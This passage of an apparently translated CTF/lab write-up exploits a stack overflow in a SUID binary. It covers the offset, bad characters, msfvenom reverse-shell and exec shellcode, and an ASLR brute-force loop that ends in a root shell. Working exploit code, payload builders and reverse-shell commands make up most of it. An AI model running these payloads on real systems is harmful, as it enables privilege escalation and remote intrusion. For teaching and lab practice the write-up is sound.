*EBP 0x36664135 ('5Af6')
*ESP 0xffffcd80 ◂— 0x66413866 ('f8Af')
*EIP 0x41376641 ('Af7A')
─────────────────────────────────────────────────────[ DISASM / i386 / set emulate on ]─────────────────────────────────────────────────────
Invalid address 0x41376641

With the crash value in hand, look it up in the pattern to find the exact offset of the saved return address:

└─# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x41376641
[*] Exact match at offset 171
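
To make the step from crash value to offset explicit, here is a Python re-implementation of what pattern_create.rb and pattern_offset.rb do. It is an added example, not code from the original write-up or from Metasploit; it reproduces the Metasploit chunk ordering (upper-case letter, lower-case letter, digit) and accepts the EIP value either as the integer gdb shows or as the four characters pwndbg prints next to it.

```python
#!/usr/bin/env python3
"""Re-implementation of the pattern_create / pattern_offset step (added example)."""
import string
import struct


def msf_pattern(length):
    """Metasploit-style cyclic pattern: consecutive 3-byte chunks of
    <Upper><lower><digit>, counting through A..Z, a..z, 0..9. Any 4 bytes
    read out of it occur at exactly one offset (up to 26*26*10*3 = 20280 bytes)."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("only %d unique bytes available" % len(out))


def pattern_offset(value, length=1000):
    """Find the crash value inside the pattern. `value` is the faulting EIP as
    the integer gdb prints (0x41376641) or as the four characters ('Af7A').
    x86 is little-endian, so the integer is packed with '<I' before searching;
    the big-endian order is tried as well, as pattern_offset.rb does."""
    pattern = msf_pattern(length)
    if isinstance(value, int):
        needles = [struct.pack("<I", value), struct.pack(">I", value)]
    elif isinstance(value, str):
        needles = [value.encode()]
    else:
        needles = [bytes(value)]
    for needle in needles:
        off = pattern.find(needle)
        if off != -1:
            return off
    return None


if __name__ == "__main__":
    print(msf_pattern(1000).decode())   # same string as pattern_create.rb -l 1000
    print(pattern_offset(0x41376641))   # 171
```

0x41376641 stored little-endian is the bytes 41 66 37 41, i.e. "Af7A"; the chunk "Af7" is the 58th chunk of the pattern (A, f, 7), which starts at byte 57 * 3 = 171, exactly what pattern_offset.rb reports.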

Permissions

Once EIP is under control, the next question is where the shellcode can live: use vmmap to see which mappings are writable and executable. In the map below the [stack] mapping is rwxp, i.e. the stack is executable (no NX), so shellcode placed there will run.

  • STACK: the stack, which holds function locals, arguments and saved return addresses

  • HEAP: the heap, memory the program allocates and frees explicitly

  • CODE: the code segment, which holds the instructions

  • DATA: the data segment, which normally holds global variables

pwndbg> vmmap
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
Start End Perm Size Offset File
0x8048000 0x8049000 r-xp 1000 0 /root/demo/file
0x8049000 0x804a000 rw-p 1000 0 /root/demo/file
0xf7d80000 0xf7da0000 r--p 20000 0 /usr/lib/i386-linux-gnu/libc.so.6
0xf7da0000 0xf7f19000 r-xp 179000 20000 /usr/lib/i386-linux-gnu/libc.so.6
0xf7f19000 0xf7f9f000 r--p 86000 199000 /usr/lib/i386-linux-gnu/libc.so.6
0xf7f9f000 0xf7fa1000 r--p 2000 21e000 /usr/lib/i386-linux-gnu/libc.so.6
0xf7fa1000 0xf7fa2000 rw-p 1000 220000 /usr/lib/i386-linux-gnu/libc.so.6
0xf7fa2000 0xf7fac000 rw-p a000 0 [anon_f7fa2]
0xf7fbf000 0xf7fc1000 rw-p 2000 0 [anon_f7fbf]
0xf7fc1000 0xf7fc5000 r--p 4000 0 [vvar]
0xf7fc5000 0xf7fc7000 r-xp 2000 0 [vdso]
0xf7fc7000 0xf7fc8000 r--p 1000 0 /usr/lib/i386-linux-gnu/ld-linux.so.2
0xf7fc8000 0xf7fec000 r-xp 24000 1000 /usr/lib/i386-linux-gnu/ld-linux.so.2
0xf7fec000 0xf7ffb000 r--p f000 25000 /usr/lib/i386-linux-gnu/ld-linux.so.2
0xf7ffb000 0xf7ffd000 r--p 2000 33000 /usr/lib/i386-linux-gnu/ld-linux.so.2
0xf7ffd000 0xf7ffe000 rw-p 1000 35000 /usr/lib/i386-linux-gnu/ld-linux.so.2
0xfffdd000 0xffffe000 rwxp 21000 0 [stack]

Controlling EIP

Confirm the offset precisely: 171 bytes of padding, 4 bytes that should land in EIP, then 20 bytes that should be at ESP. EIP reads 0x42424242 and ESP points at the C's, so the shellcode can sit right after the return address.

pwndbg> r $(python2 -c 'print "A"*171 + "B"*4 + "C"*20')
Starting program: /root/demo/file $(python2 -c 'print "A"*171 + "B"*4 + "C"*20')
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
───────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────────────────────
EAX 0x0
*EBX 0xf7fa0ff4 (_GLOBAL_OFFSET_TABLE_) ◂— 0x220d8c
*ECX 0xffffd3f0 ◂— 'CCCCCCC'
*EDX 0xffffd0bd ◂— 'CCCCCCC'
*EDI 0xf7ffcb80 (_rtld_global_ro) ◂— 0x0
*ESI 0xffffd164 —▸ 0xffffd324 ◂— '/root/demo/file'
*EBP 0x41414141 ('AAAA')
*ESP 0xffffd0b0 ◂— 'CCCCCCCCCCCCCCCCCCCC'
*EIP 0x42424242 ('BBBB')
─────────────────────────────────────────────────────[ DISASM / i386 / set emulate on ]─────────────────────────────────────────────────────
Invalid address 0x42424242

─────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────
00:0000│ esp 0xffffd0b0 ◂— 'CCCCCCCCCCCCCCCCCCCC'
... ↓ 4 skipped
05:0014│ 0xffffd0c4 —▸ 0x8048400 ((null)+48) ◂— xchg edi, eax
06:0018│ 0xffffd0c8 ◂— 0x2
07:001c│ 0xffffd0cc —▸ 0xffffd164 —▸ 0xffffd324 ◂— '/root/demo/file'
───────────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────────
► f 0 0x42424242
f 1 0x43434343
f 2 0x43434343
f 3 0x43434343
f 4 0x43434343
f 5 0x43434343
f 6 0x8048400 (null)+48
f 7 0x2

Bad characters

Generate every byte value and send it after the return address to see which bytes do not survive the trip into the buffer. The shellcode will only be 50 to 60 bytes, so the 255-byte array leaves plenty of room for the check.

#!/usr/bin/env python
from __future__ import print_function

# 0x00 is skipped on purpose: argv is a C string, so a NUL would end the argument early
for x in range(1, 256):
    print("\\x" + "{:02x}".format(x), end='')

print()

Run the program with the array appended, then dump memory at ESP with x/256xb $esp and compare it byte by byte with what was sent; the first byte that is missing or changed is a bad character.

r $(python -c 'print "A"*171 + "B"*4 + "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"')

Here \x09 (tab) and \x0a (newline) break the sequence. The cause is the delivery path, not the binary: the argument comes out of an unquoted $(...), and bash splits that output on whitespace.

Remove them and run again:

r $(python -c 'print "A"*171 + "B"*4 + "\x01\x02\x03\x04\x05\x06\x07\x08\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"')

\x20 (space) is bad for the same reason.

Remove it as well and run again: the whole array now arrives intact.

r $(python -c 'print "A"*171 + "B"*4 + "\x01\x02\x03\x04\x05\x06\x07\x08\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"')
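
The three bad bytes found above share one cause: the payload is delivered through an unquoted $(...), and bash field-splits that output on IFS (space, tab, newline), so only the part before the first such byte reaches argv[1]. The following Python script is an added example, not code from the original post. It automates the probe / dump / diff loop, models the field splitting instead of running the real binary (run_through_bash and SAMPLE_DUMP are constructed stand-ins), and parses the x/256xb $esp format so the same diff can be run over what gdb actually prints.

```python
#!/usr/bin/env python3
"""Bad-character discovery for an overflow delivered through argv (added example)."""
import re

OFFSET = 171                 # padding before the saved return address (from pattern_offset)
IFS_SPLIT = rb"[ \t\n]+"     # bash's default IFS: space, tab, newline

# Constructed sample of `x/256xb $esp` output after sending the probe: the array
# stops after 0x08 and the next byte is the NUL that ended the argument.
SAMPLE_DUMP = (
    "0xffffd0b0:\t0x01\t0x02\t0x03\t0x04\t0x05\t0x06\t0x07\t0x08\n"
    "0xffffd0b8:\t0x00\t0xa4\t0xd1\t0xff\t0xff\t0x02\t0x00\t0x00\n"
)


def badchar_probe(exclude):
    """Bytes 0x01..0xff minus everything already known to be bad. 0x00 is never
    sent: argv strings are C strings, so a NUL would just end the argument."""
    return bytes(b for b in range(1, 256) if b not in exclude)


def argv1_after_shell(buf):
    """Model of an unquoted $(python -c ...) in bash: the output is field-split
    on IFS and only the first field becomes argv[1]. This is what makes 0x09,
    0x0a and 0x20 'bad' on this target."""
    fields = [f for f in re.split(IFS_SPLIT, buf) if f]
    return fields[0] if fields else b""


def parse_gdb_dump(text):
    """Turn gdb's x/Nxb output ('0xffffd0b0:<tab>0x01<tab>0x02...') back into bytes."""
    out = bytearray()
    for line in text.splitlines():
        _, _, cells = line.partition(":")
        out += bytes(int(c, 16) for c in cells.split())
    return bytes(out)


def first_divergence(sent, observed):
    """Index of the first byte that is missing or changed, or None if all arrived."""
    for i, b in enumerate(sent):
        if i >= len(observed) or observed[i] != b:
            return i
    return None


def find_bad_chars(deliver, exclude=(0x00,)):
    """Probe -> deliver -> diff, dropping one bad byte per round, until the
    whole array survives. `deliver` stands in for 'run the target, x/256xb $esp'."""
    bad = list(exclude)
    while True:
        probe = badchar_probe(bad)
        at_esp = deliver(probe)
        idx = first_divergence(probe, at_esp)
        if idx is None:
            return sorted(bad)
        bad.append(probe[idx])


def run_through_bash(probe):
    """Constructed stand-in for the real crash: same argument layout as the page,
    passed through field splitting; returns what would sit at ESP."""
    argv1 = argv1_after_shell(b"A" * OFFSET + b"BBBB" + probe)
    return argv1[OFFSET + 4:]


if __name__ == "__main__":
    bad = find_bad_chars(run_through_bash)
    print("bad chars:", " ".join("\\x%02x" % b for b in bad))
    at_esp = parse_gdb_dump(SAMPLE_DUMP)
    idx = first_divergence(badchar_probe([0x00]), at_esp)
    print("first broken byte in dump: index %d (0x%02x)" % (idx, badchar_probe([0x00])[idx]))
```

Against the modelled shell the loop returns exactly the list the write-up arrived at by hand, \x00 \x09 \x0a \x20. The practical takeaway is that quoting the substitution, "$(python -c ...)", stops the field splitting, so only \x00 (and a stripped trailing newline) would remain a problem on this delivery path.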


shellcode

Generating the shellcode

msfvenom options:

  • -a  target architecture

  • -p  payload to use

  • -b  bad characters to avoid

  • -e  encoder to use

  • -f  output format

  • -c  additional win32 shellcode file to include

  • -v  variable name used in the generated output

Linux:
msfvenom -a x86 --platform linux -p linux/x86/shell_reverse_tcp LHOST=x.x.x.x LPORT=443 -b "\x00\x09\x0a\x20" EXITFUNC=thread -f c

linux2:
msfvenom -a x86 -p linux/x86/exec CMD=/bin/sh -b '\x00\x09\x0a\x20' -e x86/shikata_ga_nai -fc

windows:
msfvenom -p windows/shell_reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=4444 EXITFUNC=thread -b "\x00\x0a\x0d" -f py -v buf

\x00 is a bad character too (argv strings are NUL-terminated), but the script above started at 1, so it never showed up in the test; add it to the -b list by hand.

└─# msfvenom -a x86 -p linux/x86/exec CMD=/bin/sh -b '\x00\x09\x0a\x20' -e x86/shikata_ga_nai -fc
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 70 (iteration=0)
x86/shikata_ga_nai chosen with final size 70
Payload size: 70 bytes
Final size of c file: 319 bytes
unsigned char buf[] =
"\xbb\x98\xdb\x35\xff\xda\xc5\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x0b\x83\xc2\x04\x31\x5a\x11\x03\x5a\x11\xe2\x6d\xb1\x3e\xa7"
"\x14\x14\x27\x3f\x0b\xfa\x2e\x58\x3b\xd3\x43\xcf\xbb\x43\x8b"
"\x6d\xd2\xfd\x5a\x92\x76\xea\x55\x55\x76\xea\x4a\x37\x1f\x84"
"\xbb\xc4\xb7\x58\x93\x79\xce\xb8\xd6\xfe";

Exploitation

Last check before writing the exploit: does the binary contain a jmp esp or call esp we could return into? In this non-PIE binary (mapped at 0x8048000) such a gadget would sit at a fixed address and take us to the shellcode regardless of where the stack ends up, making the exploit reliable rather than probabilistic:

└─# objdump -D file | grep -P 'jmp|call' | grep esp

Nothing comes back, so there is no trampoline. The fallback is to return straight into the stack: put a large NOP sled in front of the shellcode so an approximate address is good enough, and brute-force against ASLR. The return address is a stack address in the target's range, 0xbfa0a840, written little-endian as \x40\xa8\xa0\xbf (the four bytes are reversed compared with how gdb prints the register).

The exploit script locates the binary by size rather than by path:

  • ls -la   shows the file size (door2/file is 5.1K, 5150 bytes exactly)

  • -size    find: match on file size (5150c means 5150 bytes)

  • -type    find: match on file type

  • f        regular file

A small shell script does the brute forcing. The principle is nothing more than collision: run the binary again and again until the randomised stack happens to put the sled at the guessed address. What has to be right is the ESP address and the bad-character list.

#!/bin/bash
# Pick the 5150-byte SUID binary by size wherever it currently sits under /SECRET,
# then keep firing the payload until the guessed stack address lands in the NOP sled.
# Layout: 171 bytes padding | return address (little-endian) | 20000 NOPs | encoded shellcode
while true; do
    $(find /SECRET -type f -size 5150c) $(python -c 'print "A"*171 + "\x40\xa8\xa0\xbf" + "\x90"*20000 + "\xb8\x37\xc9\x64\x34\xda\xd6\xd9\x74\x24\xf4\x5b\x29\xc9\xb1\x0b\x31\x43\x15\x03\x43\x15\x83\xc3\x04\xe2\xc2\xa3\x6f\x6c\xb5\x66\x16\xe4\xe8\xe5\x5f\x13\x9a\xc6\x2c\xb4\x5a\x71\xfc\x26\x33\xef\x8b\x44\x91\x07\x83\x8a\x15\xd8\xbb\xe8\x7c\xb6\xec\x9f\x16\x46\xa4\x0c\x6f\xa7\x87\x33"') 2> /dev/null
    sleep 1
done
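
Assembling the payload inside a python -c one-liner is where byte-order and bad-character mistakes creep in. The Python below is an added example, not the author's script: it builds the same layout (171 bytes of padding, the return address, a 20000-byte NOP sled, then the 24-byte execve shellcode from the first exploit on this page), refuses a payload that contains a bad byte or exceeds Linux's per-argument limit, and estimates how many brute-force runs a sled of that size needs. The 8 MiB stack randomisation range used for that estimate is an assumption about 32-bit Linux, not something the write-up measured.

```python
#!/usr/bin/env python3
"""Payload assembly and sanity checks for the door2 overflow (added example)."""
import struct
import sys

OFFSET = 171                              # saved-EIP offset from pattern_offset
BAD_CHARS = {0x00, 0x09, 0x0a, 0x20}      # from the bad-character run above
MAX_ARG_STRLEN = 32 * 4096                # Linux limit for a single argv string

# execve("/bin//sh") shellcode used by the first exploit on this page (24 bytes):
#   xor eax,eax ; push eax ; push "//sh" ; push "/bin" ; mov ebx,esp
#   xor ecx,ecx ; mov edx,ecx ; push 0xb ; pop eax ; int 0x80
SHELLCODE = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
             b"\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80")


def ret_address(addr):
    """Pack the guessed stack address the way x86 stores it, little-endian:
    0xbfa0a840 -> 40 a8 a0 bf, the bytes used in the page's script."""
    return struct.pack("<I", addr)


def contains_bad_chars(data, bad=BAD_CHARS):
    """Sorted list of bad bytes present in `data` (empty means clean)."""
    return sorted({b for b in data if b in bad})


def build_payload(addr, shellcode=SHELLCODE, sled=20000, offset=OFFSET):
    """[padding][return address][NOP sled][shellcode]. The address overwrites
    the saved EIP; if it lands anywhere in the sled, execution slides into the
    shellcode. Refuses payloads that could not reach the target intact."""
    payload = b"A" * offset + ret_address(addr) + b"\x90" * sled + shellcode
    bad = contains_bad_chars(payload)
    if bad:
        raise ValueError("payload contains bad chars: %s"
                         % " ".join("\\x%02x" % b for b in bad))
    if len(payload) >= MAX_ARG_STRLEN:
        raise ValueError("argument too long for execve (MAX_ARG_STRLEN)")
    return payload


def expected_attempts(sled=20000, aslr_range=8 << 20):
    """Rough number of runs before a fixed guess falls inside the sled, assuming
    the stack top is spread uniformly over aslr_range. 8 MiB is an assumption
    about 32-bit Linux stack randomisation, not a value measured on the box."""
    return aslr_range // sled


if __name__ == "__main__":
    # Emit raw bytes so the shell can pass them on:  ./file "$(python3 build.py)"
    payload = build_payload(0xbfa0a840)
    sys.stderr.write("%d bytes, roughly %d attempts expected\n"
                     % (len(payload), expected_attempts()))
    sys.stdout.buffer.write(payload)
```

With the sled at 20000 bytes the estimate comes out at a few hundred runs, which is why the 1000-iteration loop and the while-true script both get there within minutes; a guess such as 0xbf000a20 is rejected up front because its little-endian form contains \x20, \x0a and \x00.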

[email protected]:/tmp$ vim 1.sh
[email protected]:/tmp$ chmod +x 1.sh
[email protected]:/tmp$ ./1.sh
./1.sh: line 5: 2037 Segmentation fault (core dumped) $(find /SECRET -type f -size 5150c) $(python -c 'print "A"*171 + "\x40\xa8\xa0\xbf" + "\x90"*20000 + "\xb8\x37\xc9\x64\x34\xda\xd6\xd9\x74\x24\xf4\x5b\x29\xc9\xb1\x0b\x31\x43\x15\x03\x43\x15\x83\xc3\x04\xe2\xc2\xa3\x6f\x6c\xb5\x66\x16\xe4\xe8\xe5\x5f\x13\x9a\xc6\x2c\xb4\x5a\x71\xfc\x26\x33\xef\x8b\x44\x91\x07\x83\x8a\x15\xd8\xbb\xe8\x7c\xb6\xec\x9f\x16\x46\xa4\x0c\x6f\xa7\x87\x33"') 2> /dev/null
./1.sh: line 5: 2042 Segmentation fault (core dumped) $(find /SECRET -type f -size 5150c) $(python -c 'print "A"*171 + "\x40\xa8\xa0\xbf" + "\x90"*20000 + "\xb8\x37\xc9\x64\x34\xda\xd6\xd9\x74\x24\xf4\x5b\x29\xc9\xb1\x0b\x31\x43\x15\x03\x43\x15\x83\xc3\x04\xe2\xc2\xa3\x6f\x6c\xb5\x66\x16\xe4\xe8\xe5\x5f\x13\x9a\xc6\x2c\xb4\x5a\x71\xfc\x26\x33\xef\x8b\x44\x91\x07\x83\x8a\x15\xd8\xbb\xe8\x7c\xb6\xec\x9f\x16\x46\xa4\x0c\x6f\xa7\x87\x33"') 2> /dev/null
./1.sh: line 5: 2047 Segmentation fault (core dumped) $(find /SECRET -type f -size 5150c) $(python -c 'print "A"*171 + "\x40\xa8\xa0\xbf" + "\x90"*20000 + "\xb8\x37\xc9\x64\x34\xda\xd6\xd9\x74\x24\xf4\x5b\x29\xc9\xb1\x0b\x31\x43\x15\x03\x43\x15\x83\xc3\x04\xe2\xc2\xa3\x6f\x6c\xb5\x66\x16\xe4\xe8\xe5\x5f\x13\x9a\xc6\x2c\xb4\x5a\x71\xfc\x26\x33\xef\x8b\x44\x91\x07\x83\x8a\x15\xd8\xbb\xe8\x7c\xb6\xec\x9f\x16\x46\xa4\x0c\x6f\xa7\x87\x33"') 2> /dev/null

......
......

./1.sh: line 5: 2862 Segmentation fault (core dumped) $(find /SECRET -type f -size 5150c) $(python -c 'print "A"*171 + "\x40\xa8\xa0\xbf" + "\x90"*20000 + "\xb8\x37\xc9\x64\x34\xda\xd6\xd9\x74\x24\xf4\x5b\x29\xc9\xb1\x0b\x31\x43\x15\x03\x43\x15\x83\xc3\x04\xe2\xc2\xa3\x6f\x6c\xb5\x66\x16\xe4\xe8\xe5\x5f\x13\x9a\xc6\x2c\xb4\x5a\x71\xfc\x26\x33\xef\x8b\x44\x91\x07\x83\x8a\x15\xd8\xbb\xe8\x7c\xb6\xec\x9f\x16\x46\xa4\x0c\x6f\xa7\x87\x33"') 2> /dev/null
./1.sh: line 5: 2867 Segmentation fault (core dumped) $(find /SECRET -type f -size 5150c) $(python -c 'print "A"*171 + "\x40\xa8\xa0\xbf" + "\x90"*20000 + "\xb8\x37\xc9\x64\x34\xda\xd6\xd9\x74\x24\xf4\x5b\x29\xc9\xb1\x0b\x31\x43\x15\x03\x43\x15\x83\xc3\x04\xe2\xc2\xa3\x6f\x6c\xb5\x66\x16\xe4\xe8\xe5\x5f\x13\x9a\xc6\x2c\xb4\x5a\x71\xfc\x26\x33\xef\x8b\x44\x91\x07\x83\x8a\x15\xd8\xbb\xe8\x7c\xb6\xec\x9f\x16\x46\xa4\x0c\x6f\xa7\x87\x33"') 2> /dev/null
./1.sh: line 5: 2872 Segmentation fault (core dumped) $(find /SECRET -type f -size 5150c) $(python -c 'print "A"*171 + "\x40\xa8\xa0\xbf" + "\x90"*20000 + "\xb8\x37\xc9\x64\x34\xda\xd6\xd9\x74\x24\xf4\x5b\x29\xc9\xb1\x0b\x31\x43\x15\x03\x43\x15\x83\xc3\x04\xe2\xc2\xa3\x6f\x6c\xb5\x66\x16\xe4\xe8\xe5\x5f\x13\x9a\xc6\x2c\xb4\x5a\x71\xfc\x26\x33\xef\x8b\x44\x91\x07\x83\x8a\x15\xd8\xbb\xe8\x7c\xb6\xec\x9f\x16\x46\xa4\x0c\x6f\xa7\x87\x33"') 2> /dev/null
./1.sh: line 5: 2877 Segmentation fault (core dumped) $(find /SECRET -type f -size 5150c) $(python -c 'print "A"*171 + "\x40\xa8\xa0\xbf" + "\x90"*20000 + "\xb8\x37\xc9\x64\x34\xda\xd6\xd9\x74\x24\xf4\x5b\x29\xc9\xb1\x0b\x31\x43\x15\x03\x43\x15\x83\xc3\x04\xe2\xc2\xa3\x6f\x6c\xb5\x66\x16\xe4\xe8\xe5\x5f\x13\x9a\xc6\x2c\xb4\x5a\x71\xfc\x26\x33\xef\x8b\x44\x91\x07\x83\x8a\x15\xd8\xbb\xe8\x7c\xb6\xec\x9f\x16\x46\xa4\x0c\x6f\xa7\x87\x33"') 2> /dev/null
id
uid=1000(smeagol) gid=1000(smeagol) euid=0(root) groups=0(root),1000(smeagol)

Source: http://mp.weixin.qq.com/s?__biz=MzAwMDQwNTE5MA==&mid=2650246748&idx=1&sn=183d1fb726feab804e06e73f49b66cc3&chksm=82ea55f5b59ddce3038dac843b1db03799f8280f77f5bc24a7f5c2dc301b1213f5f93b18b60e#rd